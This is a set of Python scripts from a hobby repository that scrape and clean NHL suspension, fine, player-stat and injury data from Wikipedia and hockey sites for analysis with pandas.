"text": "import unittest\nfrom books import Book, Library\n\nclass BookTest(unittest.TestCase):\n def setUp(self):\n self.book = Book(1, 'Title One', 'Author One', 50, 10)\n\n\n def test_isInstance_Book(self):\n self.assertIsInstance(self.book, Book, msg = 'Object should be an instance of the class Book')\n\n\n def test_object_type(self):\n self.assertTrue((type(self.book) is Book), msg= 'Object should be of type Book')\n\n \n def test_default_price(self):\n bookX = Book(10, 'Title X', 'Author X')\n self.assertEqual(0, bookX.price, msg = 'Default price should be 0')\n\n\n def test_default_number_of_copies(self):\n bookX = Book(10, 'Title X', 'Author X')\n self.assertEqual(0, bookX.numberOfCopies, msg = 'Default number of copies should be 0')\n\n\nclass LibraryTest(unittest.TestCase):\n def setUp(self):\n self.library = Library()\n self.book1 = Book(1, 'Title One', 'Author One', 50, 10)\n self.book2 = Book(2, 'Title Two', 'Author Two', 500, 5)\n self.book3 = Book(3, 'Title Three', 'Author Three', 5000, 1)\n \n self.library.insertNewBook(self.book1)\n self.library.insertNewBook(self.book2)\n self.library.insertNewBook(self.book3)\n \n \n def test_library_instance(self):\n self.assertIsInstance(self.library, Library, msg='library should be an instance of Library')\n\n \n def test_insert_new_book(self):\n self.assertListEqual([self.book1, self.book2, self.book3], self.library.mapOfBooks,\n msg = 'All the books should be in mapOfBooks in the correct order')\n\n \n def test_duplicate_entry(self):\n self.assertRaises(Exception, self.library.insertNewBook, self.book1)\n\n\n def test_retrieve_book(self):\n self.library.retrieveBook(1)\n self.assertEqual(9, self.book1.numberOfCopies, msg = 'Number of copies should reduce by one')\n\n\n def test_retrieve_spent_book(self):\n self.library.retrieveBook(3)\n self.assertRaises(ValueError, self.library.retrieveBook, 3)\n\n\n def test_retrieve_nonexistent_book(self):\n self.assertRaises(IndexError, self.library.retrieveBook, 5)\n\n\n def test_insert_book(self):\n self.library.insertBook(1)\n self.assertEqual(11, self.book1.numberOfCopies, msg='Number of copies should increase by one')\n\n\n def test_insert_nonexistent_book(self):\n self.assertRaises(IndexError, self.library.insertBook, 5)\n\n \n def test_remove_book(self):\n self.library.removeBook(1)\n self.assertListEqual([self.book2, self.book3], self.library.mapOfBooks,\n msg='Book one should be removed from the library')\n\n\n def test_remove_nonexistent_book(self):\n self.assertRaises(IndexError, self.library.removeBook, 5)\n\n \n def test_find_book(self):\n self.assertListEqual([{'title': 'Title Two', 'book number': 2}], self.library.findBook('Title Two'))\n \n\n\nif __name__ == '__main__':\n unittest.main(exit = False)"
}
] | 3 |
BStaff1986/DoPSvsML
|
https://github.com/BStaff1986/DoPSvsML
|
5f484b2661a0b793d2e3474d5e695b1e37106e91
|
977b3a7862fa49cd73db4f8659db8914d929ae4a
|
8d13fd58aa614c0b0f963bc0ec0751d8f182704f
|
refs/heads/master
| 2021-01-22T18:51:38.450327 | 2017-03-15T23:07:48 | 2017-03-15T23:07:48 | 85,129,784 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.49191907048225403,
"alphanum_fraction": 0.499580979347229,
"avg_line_length": 28.11913299560547,
"blob_id": "bcbe8bca14bc8125d44d0d11b68373dbc42a0a31",
"content_id": "5a55308306a2bbc3f89943a3ae28d380c33ae737",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8353,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 277,
"path": "/Add_Stats.py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nimport requests\r\nimport pickle\r\nimport json\r\nimport time\r\nimport re\r\n\r\ndops = pd.read_csv('Scrubbed_CSV.csv', encoding='latin1')\r\n\r\ndef parse_id(string):\r\n '''\r\n With search suggestion data returned by NHL.com we can parse\r\n the player's NHL ID number\r\n '''\r\n if len(string) < 10:\r\n return None, None, None\r\n else:\r\n parse = re.compile(r'''\r\n (?:p\\|)\r\n (\\d*)\r\n (?:\\|)\r\n (\\w+)\r\n (?:\\|)\r\n (\\w+)\r\n .*\r\n ''',re.VERBOSE)\r\n parsed = parse.search(string)\r\n try:\r\n id_num = parsed.group(1)\r\n l_name = parsed.group(2)\r\n f_name = parsed.group(3)\r\n except AttributeError:\r\n return \"Error\", \"Error\", \"Error\"\r\n return id_num, f_name, l_name\r\n\r\ndef nhl_scrape():\r\n dops['vic_nhl_id'] = ''\r\n dops['off_nhl_id'] = ''\r\n \r\n for index, row in dops.iterrows():\r\n time.sleep(1)\r\n if type(row['vic_last_name']) is float:\r\n continue\r\n else:\r\n start_trio = row['vic_last_name'][0:3].lower()\r\n r = requests.get('https://suggest.svc.nhl.com/svc/suggest/v1/min_all/'\r\n + start_trio + '/99999')\r\n result = json.loads(r.text)\r\n for ply in result['suggestions']:\r\n id_num, f_name, l_name = parse_id(ply)\r\n if (f_name == row['vic_first_name'] and\r\n l_name == row['vic_last_name']):\r\n dops.set_value(index, 'vic_nhl_id', id_num)\r\n break\r\n \r\n else:\r\n print('NO MATCH')\r\n \r\n if type(row['off_last_name']) is float:\r\n continue\r\n else:\r\n start_trio = row['off_last_name'][0:3].lower()\r\n r = requests.get('https://suggest.svc.nhl.com/svc/suggest/v1/min_all/'\r\n + start_trio + '/99999')\r\n result = json.loads(r.text)\r\n for ply in result['suggestions']:\r\n id_num, f_name, l_name = parse_id(ply)\r\n if (f_name == row['off_first_name'] and\r\n l_name == row['off_last_name']):\r\n print(index, id_num, f_name, l_name)\r\n dops.set_value(index, 'off_nhl_id', id_num)\r\n break\r\n \r\n else:\r\n continue\r\n\r\n'''\r\nThe below is for hockey-reference.com\r\nThe following will capture \r\n'''\r\ndef get_href_id(row, offender=True):\r\n '''\r\n Input DataFrame row\r\n Return identifiers for Hockey-Reference Scraping\r\n '''\r\n if offender == True:\r\n last_name = 'off_last_name'\r\n first_name = 'off_first_name'\r\n elif offender == False:\r\n last_name = 'vic_last_name'\r\n first_name = 'vic_first_name'\r\n \r\n new_year_months = [1,2,3,4,5,6]\r\n \r\n year = row['off_year']\r\n\r\n if row['off_month'] not in new_year_months:\r\n year += 1\r\n \r\n if type(row[last_name]) is float:\r\n return None, None, None\r\n else:\r\n id_ref = (row[last_name][0:5].lower() +\\\r\n row[first_name][0:2].lower()+\\\r\n '01')\r\n init_let = id_ref[0]\r\n \r\n return init_let, id_ref, year\r\n \r\n \r\ndef hockey_ref_scrape(values):\r\n '''\r\n Input hockey reference player ID information\r\n Returns gamelog table for year of incident\r\n '''\r\n init_let = values[0]\r\n id_ref = values[1]\r\n year = values[2]\r\n \r\n if init_let == None or id_ref == None or year == None:\r\n return None, None, None\r\n \r\n url = 'http://www.hockey-reference.com/players/'+\\\r\n init_let + '/'+ id_ref + '/gamelog/'+ str(year)\r\n r = requests.get(url)\r\n soup = BeautifulSoup(r.text, \"lxml\")\r\n \r\n table = soup.find_all('table',{'class':'row_summable'}) \r\n \r\n return table[0] \r\n\r\ndef parse_table(table, off_date):\r\n '''\r\n '''\r\n global new_cols\r\n \r\n rows = table.find_all('tr', {\"id\":re.compile(r'.*')})\r\n 
stat_dict = create_headers(rows[2])\r\n    if new_cols == False:\r\n        create_new_df_columns(rows[2])\r\n    \r\n    for row in rows:\r\n        \r\n        # Check if the game is before (or on) or after the offending date\r\n        game_date = row.find_next('td', {'data-stat':'date_game'}).text\r\n        good_date = date_checker(game_date, off_date)\r\n        \r\n        if good_date:\r\n            print(stat_dict)\r\n            stat_dict = get_stats(stat_dict, row)\r\n            print(stat_dict)\r\n            print (''.center(20, '.'))\r\n        else:\r\n            return stat_dict\r\n    \r\n    return stat_dict\r\n    \r\ndef create_headers(row):\r\n    '''\r\n    Input row of data.\r\n    Parses the names of the categories we'd like to keep\r\n    Returns a prepared dictionary\r\n    '''\r\n    stat_dict = {}\r\n    skip = skip_headers()\r\n    \r\n    for datum in row: \r\n        if datum['data-stat'] in skip:\r\n            continue\r\n        else:\r\n            stat_dict.setdefault(datum['data-stat'],0)\r\n    \r\n    return stat_dict\r\n\r\ndef skip_headers():\r\n    '''\r\n    Returns a list of the headers to be skipped when creating and updating\r\n    the stats dictionary\r\n    '''\r\n    skip = ['ranker','date_game', 'team_id', 'game_location',\r\n            'opp_id', 'game_result', 'shot_pct', \r\n            'faceoff_percentage_all']\r\n    return skip\r\n    \r\ndef date_checker(game_date, off_date):\r\n    '''\r\n    Input date of the game, and the date of suspension offense\r\n    Returns True if the game is the same day or before the offense\r\n    Returns False if the game is after the suspension event\r\n    '''\r\n    off_date = datetime.strptime(off_date, '%Y-%m-%d')\r\n    game_date = datetime.strptime(game_date, '%Y-%m-%d')\r\n    \r\n    if game_date <= off_date:\r\n        return True\r\n    else:\r\n        return False\r\n    \r\ndef get_stats(stat_dict, row):\r\n    '''\r\n    Input a row and the stat dictionary\r\n    Parses the new values and adds them to the dictionary values\r\n    Returns the dictionary\r\n    '''\r\n    skip = skip_headers()\r\n    special = ['age', 'time_on_ice']\r\n    \r\n    for td in row.find_all('td'):\r\n        stat = td['data-stat']\r\n        if stat not in skip and stat not in special:\r\n            stat_dict[stat] += int(td.text)\r\n        elif stat == 'time_on_ice':\r\n            toi = re.search(r'(\\d{1,2}):?(\\d{1,2})',td.text)\r\n            toi_min = int(toi.group(1))\r\n            toi_sec = int(toi.group(2))\r\n            stat_dict[stat] = ((toi_min * 60) + toi_sec)\r\n        elif stat == 'age':\r\n            stat_dict[stat] = td.text\r\n    \r\n    return stat_dict \r\n\r\n# Step 1: Get player ID\r\n# Step 2: Scrape player's gamelog table\r\n# Step 3: Collect season stats prior to offense date\r\n# Step 3b: Deal with Preseason offenses (like Shaw's, dops.loc[1])\r\n# Step 4: Extract stat dictionaries into pandas DataFrame\r\n\r\ndef create_new_df_columns(row):\r\n    '''\r\n    Inserts new columns into dops dataframe\r\n    '''\r\n    \r\n    global new_cols\r\n    \r\n    col_prefix = ['off_', 'vic_']\r\n    \r\n    skip = skip_headers()\r\n    for prefix in col_prefix:\r\n        for datum in row:\r\n            if datum['data-stat'] in skip:\r\n                continue\r\n            else:\r\n                string = prefix + datum['data-stat']\r\n                dops[string] = 0\r\n    \r\n    \r\n    new_cols = True\r\n    \r\ndef stats_to_dataframe(off_stat, vic_stat, index):\r\n    '''\r\n    Input the offender's (and optionally the victim's) stat dicts\r\n    Writes each stat into the matching dops column for this row\r\n    '''\r\n    # Write with set_value, mirroring its usage in nhl_scrape above\r\n    for stat, val in off_stat.items():\r\n        dops.set_value(index, 'off_' + stat, val)\r\n    \r\n    if vic_stat:\r\n        for stat, val in vic_stat.items():\r\n            dops.set_value(index, 'vic_' + stat, val)\r\n    \r\n    \r\nnew_cols = False\r\nfor index, row in dops.loc[0:1].iterrows():\r\n    print(index)\r\n    print(row['off_date'])\r\n    print(row['off_last_name']) \r\n    \r\n    off_table = hockey_ref_scrape(get_href_id(row, offender=True))\r\n    \r\n    if off_table:\r\n        off_stats = parse_table(off_table, row['off_date'])\r\n    else:\r\n        
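# hockey_ref_scrape found no usable gamelog (e.g. the name was missing), so there is nothing to tally\r\n        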
\r\n        off_stats = None\r\n\r\n    # assumed next step: repeat the scrape for the victim\r\n    #vic_table = hockey_ref_scrape(get_href_id(row, offender=False))\r\n\r\n"
},
{
"alpha_fraction": 0.5356037020683289,
"alphanum_fraction": 0.5406346917152405,
"avg_line_length": 32,
"blob_id": "4e46c86c2d39df2e0dcd0766bc7cbf34e4302e5b",
"content_id": "87e5368e372838ceaf96f8ec3c0e4e23299d2601",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2584,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 76,
"path": "/Injury Data Add (Later).py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "'''\r\nInjury Data from http://nhlinjuryviz.blogspot.ca/p/index-page.html\r\n'''\r\n\r\nimport pandas as pd\r\nimport re\r\n\r\n# TODO: Get victim's team\r\n\r\ninj = pd.read_csv('NHL_Injuries.csv')\r\n\r\n# TODO: Change this CSV to the new stats one\r\ndops = pd.read_csv('Scrubbed_CSV.csv', encoding='latin1')\r\n\r\ndef reformat_season_year(row):\r\n '''\r\n Uses regex to parse the starting year of the season\r\n '''\r\n \r\n year = re.compile(r'''\r\n ([2][0]\\d{2})\r\n \r\n ''', re.VERBOSE)\r\n return int(re.search(year, row).group(1))\r\n\r\ninj['start_year'] = inj['Season'].apply(reformat_season_year)\r\n\r\n# Eliminate the injuries that are not caused by things players get \r\n# suspended for.\r\nelim_injs = ['Pneumonia', 'Thyroid', 'Migraine', 'Blood clots',\r\n 'Sinus', 'Stomach', 'Bronchitis', 'Vertigo', 'Heart',\r\n 'Dizziness', 'Appendectomy', 'Fatigue', 'Illness', 'Flu']\r\ninj = inj[-inj['Injury Type'].isin(elim_injs)]\r\n\r\nvictim_names = dops['victim'].unique()\r\n#victim_names = victim_names[victim_names != 'No Player Victim']\r\n\r\nvic_set = set(dops['vic_last_name'])\r\ninj_set = set(inj['Player'])\r\n\r\nintersect = inj_set.intersection(vic_set)\r\n#intersect = set(['Zucker'])\r\n\r\n# See how many injuries and suspension year match up\r\ninj_connect = pd.DataFrame(columns=['victim', 'date', 'games_missed',\r\n 'inj_type', 'susp_act'])\r\n\r\n# TODO: Multiple injuries in a year should appear as separate lines\r\n# TODO: Maybe get victim's team first\r\n# USE df[(df['x'] == 'a') & (df['y'] == 'b')]!!!\r\nfor player in intersect:\r\n dops_df = dops[dops['vic_last_name'] == player]\r\n inj_df = inj[inj['Player'] == player]\r\n \r\n new_year_months = [1,2,3,4,5,6,7]\r\n for index, row in dops_df.iterrows():\r\n off_year = row['off_year']\r\n if row['off_month'] in new_year_months:\r\n off_year -= 1 \r\n \r\n if off_year in inj_df['start_year'].values:\r\n inj_year = inj_df[inj_df['start_year'] == off_year]\r\n #print(inj_year)\r\n victim = row['vic_last_name']\r\n date = row['off_date']\r\n print(date)\r\n g_miss = inj_year['Games Missed']\r\n print(g_miss)\r\n inj_type = inj_year['Injury Type']\r\n susp_act = row['offense_cat']\r\n \r\n inj_connect.loc[len(inj_susp_connect)] = [victim, date,\r\n g_miss, inj_type, susp_act]\r\n break \r\n \r\nprint(len(inj_susp_connect))\r\n"
},
{
"alpha_fraction": 0.5173559784889221,
"alphanum_fraction": 0.5256646871566772,
"avg_line_length": 33.6315803527832,
"blob_id": "e9696ddcdd5d22414ae016c06225959afa0405ca",
"content_id": "bc2d5e4e7e6a484648d6a9001b2908801bd5956c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10832,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 304,
"path": "/CSV_cleaner.py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nfrom math import isnan\r\nimport re\r\n\r\ndops = pd.read_csv('NHL_Suspensions.csv', encoding='latin1')\r\n\r\n'''\r\nWarning: Regex for victim's name currently will not work with names like\r\nD'Amigo except for when parsing that last name in the form where the first\r\nname comes first. Will not do so the other way around and not for offenders.\r\n'''\r\n\r\n# Column 1 = Date of Offense\r\n# Column 2 = Offender Name\r\n# Column 3 = Offender's Team\r\n# Column 4 = Offense\r\n# Column 5 = Day of DoPs decision\r\n# Column 6 = Suspension Amount\r\n# Column 7 = Forfeited Salary\r\n# Column 8 = Fine\r\n\r\n# TODO: Get Contract Info at https://www.capfriendly.com/\r\n\r\n\r\ndef re_parse_offense(row):\r\n '''\r\n This function goes through all the offense descriptions and, based on\r\n keywords it's able to parse using Regex, assigns a short description\r\n to be coded in later exploration\r\n '''\r\n re_exps = {r'.*abuse.*official' : 'Abuse of Official',\r\n r'Attempt.*' : 'Attempt to Injure',\r\n r'Automatic.*' : 'Automatic Suspension',\r\n r'Blindsid.*' : 'Blindsiding',\r\n r'Board.*' : 'Boarding',\r\n r'[Bb]utt-?end.*' : 'Butt-Ending',\r\n r'[Cc]harg.*' : 'Charging',\r\n r'Clip.*' : 'Clipping',\r\n r'([Cc]omment.*|[Cc]omplaint.*|[Gg]esture.*|[Ss]lur)' : 'Comments/Gestures',\r\n r'Cross.check.*' : 'Cross-checking',\r\n r'Diving.*' : 'Diving',\r\n r'Elbow.*': 'Elbowing',\r\n r'[Hh]ead-?butt.*' : 'Head-Butting',\r\n r'High.stick.*' : 'High-Stick',\r\n r'(Hit.*|Check.*) from behind':'Hitting from Behind',\r\n r'Illegal( check| hit)' : 'Illegal Check',\r\n r'(Inappropriate.*|conduct)' : 'Inappropriate Conduct',\r\n r'([Ii]nstigat.*|[Aa]ggress.*)' : 'Instigator', \r\n r'Interfer.*' : 'Interference',\r\n r'Knee-on-knee.*' : 'Knee-on-knee',\r\n r'([Kk]ick.*|Kneeing)' : 'Kicking or Kneeing',\r\n r'([Ll]ate|[Ll]ow)?.*([Hh]it.|[Cc]heck)(to the head)?' : 'Illegal hit',# Late, low, to head\r\n r'[Ll]eaving.*bench' : 'Leaving Bench',\r\n r'[Pp]unch.*' : 'Punching', \r\n r'Roughing.*' : 'Roughing',\r\n r'Slash.*' : 'Slashing', \r\n r'[Ss]lew.*' : 'Slew-footing',\r\n r'Spear.*': 'Spearing',\r\n r'[Tt]rip.*' : 'Tripping',\r\n r'.*[Vv]iolating' : 'Drugs',\r\n }\r\n for k,v in re_exps.items():\r\n if re.search(k, row):\r\n return v\r\n else:\r\n continue\r\n return 'NO PARSE' # Labels uncoded entries\r\n \r\n\r\ndef re_parse_victim(row):\r\n '''\r\n This function parses player names out of the description of the offenses\r\n '''\r\n \r\n errors = ['Substances Program','Health Program',\r\n 'Star Game','Montreal Canadiens',\r\n 'Vancouver Canucks','Maple Leafs','Red Wings',]\r\n \r\n vic = re.compile(r'''\r\n (?:[A-Z]\\w+ing)?\r\n .*\r\n (([A-Z]\\w+\\s[A-Z]\\w+| # Regular names\r\n [A-Z][.]\\s?[A-Z][.]\\s?\\s[A-Z]\\w+| # P. 
K.s and T.J.s\r\n              [A-Z]\\w+\\s[A-Z]'[A-Z]\\w+ # D'Amigos\r\n              ))\r\n              ''', re.VERBOSE)\r\n    try:\r\n        if vic.search(row).group(1) in errors:\r\n            return \"No Player Victim\"\r\n        else:\r\n            return vic.search(row).group(1)\r\n    except AttributeError:\r\n        return \"No Player Victim\"\r\n\r\n\r\ndef re_parse_total_games(row):\r\n    '''\r\n    This finds the total number of games a player was suspended for.\r\n    The regex assumes that the first number is the number of games suspended\r\n    which is true for 99% of entries*\r\n\r\n    (*Tortorella was suspended 15 days, which amounted to 6 games)\r\n    '''\r\n\r\n    games = re.compile(r'''\r\n                       (\\d+)\r\n                       (?:\\s.*)?\r\n                       ''', re.VERBOSE)\r\n    return int(re.search(games, row).group(1))\r\n\r\ndef re_parse_playoff_games(row):\r\n    '''\r\n    Uses regex to find the number of playoff games in the suspension\r\n    '''\r\n\r\n    post_games = re.compile(r'''\r\n                            .*?\r\n                            (\\d+)\r\n                            (?:\\s[A-Z]{,3})?\r\n                            (?:\\s\\d{4})?\r\n                            \\s\r\n                            post-season.*\r\n                            ''', re.VERBOSE)\r\n    try:\r\n        return int(re.search(post_games, row).group(1))\r\n    except AttributeError:\r\n        return 0\r\n\r\ndef re_parse_preseason_games(row):\r\n    '''\r\n    Uses regex to get the number of preseason games in the suspension\r\n    '''\r\n\r\n    pre_games = re.compile(r'''\r\n                           .*?\r\n                           (\\d+)\r\n                           (?:\\s[A-Z]{,3})?\r\n                           (?:\\s\\d{4})?\r\n                           \\s\r\n                           pre-season.*\r\n                           ''', re.VERBOSE)\r\n    try:\r\n        return int(re.search(pre_games, row).group(1))\r\n    except AttributeError:\r\n        return 0\r\n\r\ndef money_to_float(row):\r\n    replacements = {\"$\":'', \",\":\"\"}\r\n    if type(row) is str:\r\n        try:\r\n            return float(''.join([replacements.get(c,c) for c in row]))\r\n        except ValueError:\r\n            try:\r\n                re_expr = re.compile(r'''\r\n                                     [$]\r\n                                     (\\d+,\\d+.\\d+)\r\n                                     .*?\r\n                                     ''', re.VERBOSE)\r\n                money = re.search(re_expr, row).group(1)\r\n                return float(''.join([replacements.get(c,c) for c in money]))\r\n            except AttributeError:\r\n                return \"ERROR\"\r\n    else:\r\n        return 0\r\n\r\ndef get_year(row):\r\n    '''\r\n    This function pulls the year out of datetime object and returns\r\n    just the year\r\n    '''\r\n    try:\r\n        return int(row.year)\r\n    except ValueError:\r\n        return 0\r\n\r\ndef get_month(row):\r\n    '''\r\n    This function pulls the month out of datetime object and returns\r\n    just the month\r\n    '''\r\n    try:\r\n        return int(row.month)\r\n    except ValueError:\r\n        return 0\r\n\r\ndef get_day(row):\r\n    '''\r\n    This function pulls the day out of datetime object and returns\r\n    just the day\r\n    '''\r\n    try:\r\n        return int(row.day)\r\n    except ValueError:\r\n        return 0\r\n\r\ndef get_off_lastname(name):\r\n    '''Parse the offender's last name'''\r\n    non_player = ['No Player Victim', 'Team', 'Organization']\r\n    if name in non_player:\r\n        return None\r\n\r\n    if ',' in name:\r\n        reg_exp = re.compile(r'(\\w+)[,]?\\s\\w+')\r\n        return reg_exp.findall(name).pop()\r\n\r\n    else:\r\n        reg_exp = re.compile(r'.*\\s(\\w+)')\r\n        return reg_exp.findall(name).pop()\r\n\r\ndef get_off_firstname(name):\r\n    '''Parse the offender's first name'''\r\n    non_player = ['No Player Victim', 'Team', 'Organization']\r\n    if name in non_player:\r\n        return None\r\n\r\n    if ',' in name:\r\n        reg_exp = re.compile(r'\\w+[,]?\\s(\\w+)')\r\n        return reg_exp.findall(name).pop()\r\n\r\n    else:\r\n        reg_exp = re.compile(r'(.*)\\s\\w+')\r\n        return reg_exp.findall(name).pop()\r\n\r\ndef get_vic_lastname(name):\r\n    '''Parse the victim's last name'''\r\n    non_player = ['No Player Victim', 'Team', 'Organization']\r\n    if name in non_player:\r\n        return None\r\n\r\n    if ',' in name:\r\n        reg_exp = 
re.compile(r'(\\w+)[,]?\\s\\w+')\r\n return reg_exp.findall(name).pop()\r\n \r\n else:\r\n reg_exp = re.compile(r'.*\\s([A-Z].\\w+|\\w+)')\r\n return reg_exp.findall(name).pop()\r\n\r\ndef get_vic_firstname(name):\r\n non_player = ['No Player Victim', 'Team', 'Organization']\r\n if name in non_player:\r\n return None\r\n \r\n if ',' in name:\r\n reg_exp = re.compile(r'\\w+[,]?\\s(\\w+)')\r\n return reg_exp.findall(name).pop()\r\n \r\n else:\r\n reg_exp = re.compile(r'(.*)\\s\\w+')\r\n return reg_exp.findall(name).pop()\r\n\r\n# Apply functions to create new columns\r\ndops['offense_cat'] = dops['offense'].apply(re_parse_offense)\r\ndops['victim'] = dops['offense'].apply(re_parse_victim)\r\ndops['total_susp_games'] = dops['susp'].apply(re_parse_total_games)\r\ndops['playoff_susp_games'] = dops['susp'].apply(re_parse_playoff_games)\r\ndops['preseason_susp_games'] = dops['susp'].apply(re_parse_preseason_games)\r\ndops['reg_susp_games'] = (dops['total_susp_games'] - dops['playoff_susp_games']\r\n - dops['preseason_susp_games'])\r\ndops['forfeit_sal'] = dops['forfeit_sal'].apply(money_to_float)\r\n\r\n# Turn dates into datetime, extract year, month, date\r\ndops['off_date'] = pd.to_datetime(dops['off_date'], \r\n infer_datetime_format=True)\r\ndops['off_year'] = dops['off_date'].apply(get_year)\r\ndops['off_month'] = dops['off_date'].apply(get_month)\r\ndops['off_day'] = dops['off_date'].apply(get_day)\r\n\r\n# Same as above but for the dops date\r\ndops['dops_date'] = pd.to_datetime(dops['dops_date'], \r\n infer_datetime_format=True)\r\ndops['dops_year'] = dops['dops_date'].apply(get_year)\r\ndops['dops_month'] = dops['dops_date'].apply(get_month)\r\ndops['dops_day'] = dops['dops_date'].apply(get_day)\r\n\r\ndops['off_last_name'] = dops['offender'].apply(get_off_lastname)\r\ndops['off_first_name'] = dops['offender'].apply(get_off_firstname)\r\ndops['vic_last_name'] = dops['victim'].apply(get_vic_lastname)\r\ndops['vic_first_name'] = dops['victim'].apply(get_vic_firstname)\r\n\r\n# Manually set some unique cases\r\ndops.set_value(21, 'offense_cat', 'Spearing')\r\ndops.set_value(139,'offense_cat', 'Instigating')\r\ndops.set_value(147, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(198, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(205, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(248, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(338, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(339, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(352, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(381, 'offense_cat', 'Illegal Hit')\r\ndops.set_value(388, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(390, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(394, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(401, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(431, 'offense_cat', 'Inappropriate Conduct')\r\ndops.set_value(182, 'total_susp_games', 6)\r\ndops.set_value(241, 'total_susp_games', 6)\r\ndops.set_value(381, 'total_susp_games', 4)\r\ndops.set_value(94, 'forfeit_sal', 0)\r\n\r\ndops.drop(dops.index[1], inplace=True) # Suspension included in two data sets\r\n\r\n\r\ndops.to_csv('Scrubbed_CSV.csv')\r\n"
},
{
"alpha_fraction": 0.49086934328079224,
"alphanum_fraction": 0.5066872239112854,
"avg_line_length": 31.670995712280273,
"blob_id": "570d2e5c5b557990464ecc3fb24143b03463fd86",
"content_id": "ae5fd4046c2cccd26a6427362c37e0d66e4418fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7778,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 231,
"path": "/NHL_Wiki_Scraper.py",
"repo_name": "BStaff1986/DoPSvsML",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = 'https://en.wikipedia.org/wiki/'\r\n\r\n# Collect all the URL endings for the pages we want\r\npages = ['{}–{}_NHL_suspensions_and_fines'.format(str(n-1), \r\n str(n)[-2:]) for n in range(2017, 2009, -1)]\r\n\r\n# Create our DataFrame and preload the columns we will use\r\ndops_df = pd.DataFrame(columns=('off_date', 'offender', 'off_team', 'offense', \r\n 'dops_date', 'susp', 'forfeit_sal', 'fine'))\r\n\r\n\r\n\r\ndef suspension_table(table):\r\n '''\r\n This function goes through the Wikitables that hold data about player\r\n suspensions. \r\n '''\r\n rows = table.find_all('tr')\r\n for row in rows[1:-1]:\r\n td = row.find_all('td')\r\n \r\n # NOTE: Some tables had data in a span class, others just text\r\n # which is why there are some try and except clauses.\r\n \r\n # td[0] holds Offense Date\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n #td[1] holds the Offender's Name\r\n try:\r\n offender = td[1].find('span').text\r\n except:\r\n offender = td[1].text\r\n # td[2] holds Offender's Team \r\n off_team = td[2].text\r\n # td[3] holds a description of the Offense. \r\n offense = td[3].text\r\n # td[4] holds the day the suspension was given out\r\n try:\r\n dops_date = td[4].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n dops_date = td[4].text\r\n # td[5] holds the length of the suspension\r\n susp = td[5].text\r\n # td[6] holds the amount of salary forfeited from the suspension \r\n try:\r\n forfeit_sal = td[6].text\r\n except IndexError:\r\n forfeit_sal = 'N/A'\r\n # No fines so value is 0\r\n fine = 0\r\n\r\n # Store all the scraped values in the DataFrame \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n\r\n \r\n\r\ndef fines_table(table):\r\n '''\r\n This function goes through the tables that contain the fine data\r\n found in Wikipedia tables. 
\r\n '''\r\n rows = table.find_all('tr')\r\n \r\n # NOTE: Some tables used span classes while others used simple text\r\n # which is why there are lots of try and except clauses\r\n \r\n for row in rows[1:-1]:\r\n td = row.find_all('td')\r\n # Get the date of offense\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n # Get the offender's name \r\n try:\r\n offender = td[1].find('span').text\r\n except AttributeError:\r\n offender = td[1].text\r\n # Get offending team\r\n off_team = td[2].text\r\n # Get the offense\r\n offense = td[3].text\r\n # Get the day the DoPS made a decision\r\n try:\r\n dops_date = td[4].find('span',{'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n dops_date = td[4].text\r\n susp = 0\r\n forfeit_sal = 0\r\n # Get the fine amount\r\n fine = td[5].text\r\n \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, fine]\r\n \r\ndef susp_table_oldstyle(table):\r\n '''\r\n Older Wikipedia tables did not have a column for the day the suspensions\r\n were applied and this shifted the data around so a new function was made.\r\n '''\r\n \r\n rows = table.find_all('tr')\r\n for row in rows[1:]:\r\n td = row.find_all('td')\r\n # Get the date of offense\r\n try:\r\n off_date = td[0].find('span',\r\n {'style':'white-space:nowrap'}).text\r\n except AttributeError:\r\n off_date = td[0].text\r\n # Get the offender's name \r\n try:\r\n offender = td[1].find('span').text\r\n except AttributeError:\r\n offender = td[1].text\r\n # Get offending team\r\n off_team = td[2].text\r\n # Get the offense\r\n offense = td[3].text\r\n # Get the day the DoPS made a decision\r\n dops_date = np.nan\r\n susp = td[4].text\r\n forfeit_sal = np.nan\r\n # Get the fine amount\r\n fine = np.nan\r\n \r\n dops_df.loc[len(dops_df)] = [off_date, offender, off_team, \r\n offense, dops_date, susp, forfeit_sal, 